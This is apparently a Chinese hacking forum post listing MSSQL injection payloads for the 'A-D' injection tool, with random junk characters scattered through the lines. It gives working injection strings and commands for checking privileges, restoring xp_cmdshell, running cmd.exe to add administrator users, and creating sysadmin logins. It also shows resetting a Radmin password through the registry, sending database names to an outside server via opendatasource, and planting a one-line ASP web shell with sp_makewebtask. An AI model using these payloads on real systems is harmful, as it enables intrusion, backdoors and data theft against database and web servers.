阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
% y" @8 R; ]/ P! u  b) ?and 1=(Select IS_MEMBER('db_owner'))
( {3 b, l5 w6 j4 a+ JAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
/ s3 ^0 ^6 [8 N- c% a* oand 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --


1 m5 m  {3 }) L% ]" f0 r数字类型
and char(124)%2Buser%2Bchar(124)=0
$ i0 p8 X1 B4 b" f9 h
字符类型
$ n1 S& h2 h$ G! A8 J* l$ [' and char(124)%2Buser%2Bchar(124)=0 and ''='

7 g1 m+ @% k# M' D搜索类型
  {  _/ n' R# n8 o' and char(124)%2Buser%2Bchar(124)=0 and '%'='
% x- H8 e/ U" k
# i: ]+ p/ ]/ U$ G爆用户名
. C4 @8 ]/ f! a( S* Jand user>0
9 ?4 X; m$ ~) ~; D' s' and user>0 and ''='
  p9 {: o3 [! R
. S# R# B; j: K% J/ z- x3 C检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
and exists (select * from sysobjects);--

- v2 O1 l+ z- z  W) O$ m, C检测是否支持多行
1 w& o! a$ o, Q, }, ~6 ];declare @d int;--

恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
4 w8 c- i' t/ i: |. {9 {  Y9 @# m. z
2 ]* A9 k: `( x9 }/ L
! W+ ^1 N% W7 `9 ]select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
9 Q& B1 o% L- Y, s; F
//-----------------------
6 |" j* l# w. Z+ E3 k: f, p' ~//      执行命令
" P4 B* O# j" m9 @( O5 a//-----------------------
1 N; s) W4 F: [; s首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
8 S+ v$ `: T) {+ B& K% X+ R- k
8 H2 i$ Q; C7 x, X7 a7 A# u然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令
: s2 Q# h) M: W;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
4 U! `. I" ~( J* L  s/ q  N
判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
! r) i" H- N2 Y9 G5 g% f
6 B$ q4 B2 f$ d写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ
; g' S; g) c4 n- X
+ Y  ~0 u5 H. z$ H读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
' d6 f/ f, j% ]+ S) V, l
0 P8 S7 W+ D& l) G读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1
# `! g( w, |6 ?: G0 c7 d' [

数据库备份
1 Q8 l- L; X) A# U" zbackup database pubs to disk = 'c:\123.bak'

//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
% M9 T  ~$ {) t/ J

2 m( k- Y9 n% C% ?( n# `2 G0 i& v
' U! ~4 @  ?! k* C* K0 b7 P  [' A更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'
* @+ F% u1 C1 z5 L
5 Q5 w. O7 Y" O- Y2 z& `添加和删除一个SA权限的用户test：
4 |& C) W5 r6 w7 t$ i( j/ Rexec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

1 C2 }# D* I* O, x# X6 K$ d. d删除扩展存储过过程xp_cmdshell的语句:
' g$ l0 f0 R( d, N9 K5 f0 yexec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public


停掉或激活某个服务。

exec master..xp_servicecontrol 'stop','schedule'
! i2 f8 x) G9 g6 U. Yexec master..xp_servicecontrol 'start','schedule'
- q3 i, P; J2 R- \6 ^, w
dbo.xp_subdirs
8 \% E' [9 Y& I" T
! ]7 C9 {& K6 P: k2 c% ?+ ]只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
* F1 o, M0 a0 |( I8 y) Z" f
  }9 a9 R: V6 m7 tdbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
: b8 z9 S9 U9 L/ M) a8 Z/ ^所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
& F! B$ \. x8 i" E'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
3 C% A: A% p1 n% q* J- X'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

7 n$ z. F: h; |0 g7 X: o5 F停掉某个执行中的程序，但赋予的参数是 Process ID。
2 N% _. n/ A9 O. l  o利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
+ I7 x9 s2 i6 ?1 e, Z, b/ _
+ n+ @- i6 q: P- u8 V! O7 Bxp_terminate_process 2484

xp_unpackcab
# [9 D7 F+ |7 d5 Q! D+ W4 M
解开压缩档。
! D  D: q' S0 T& ^5 Z; \
xp_unpackcab 'c:\test.cab','c:\temp',1


某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

9 h2 ?6 F4 M7 ^0 w6 Z: q9 y; i# s5 ncreate database lcx;
Create TABLE ku(name nvarchar(256) null);
0 M  {& k1 L: e6 c* N; mCreate TABLE biao(id int NULL,name nvarchar(256) null);

2 z  {! X& O9 V& y  }; I* I//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases


! L( y8 C' |2 f& g5 Y//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

- K! N8 W2 ~' \用 sp_makewebtask直接在web目录里写入一句话马：
  k$ r8 `+ x' n1 |5 W' |http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
. j' ]8 L, j% ^% v& A% l
//更新表内容
1 L/ Y7 {( W# R4 E4 qUpdate films SET kind = 'Dramatic' Where id = 123
) v0 f' l9 \1 M, h
* P" g3 U2 w/ `' U' }4 i* t9 R//删除内容
& W. M, f& Y" f- Tdelete from table_name where Stockid = 3